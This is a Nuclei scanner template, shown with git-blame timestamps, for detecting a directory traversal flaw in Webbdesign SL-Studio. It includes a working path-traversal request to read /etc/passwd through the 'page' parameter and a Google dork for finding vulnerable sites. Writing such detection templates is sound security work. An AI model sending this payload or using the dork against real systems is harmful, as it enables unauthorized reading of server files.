nuclei-templates/vulnerabilities/other/sl-studio-lfi.yaml

27 lines
552 B
YAML
Raw Normal View History

2021-12-28 08:23:04 +00:00
id: sl-studio-lfi
info:
2021-12-28 11:41:18 +00:00
name: Webbdesign SL-Studio Directory Traversal
2021-12-28 08:23:04 +00:00
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018110187
2021-12-29 03:50:13 +00:00
metadata:
google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.'
2021-12-28 08:23:04 +00:00
tags: slstudio,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200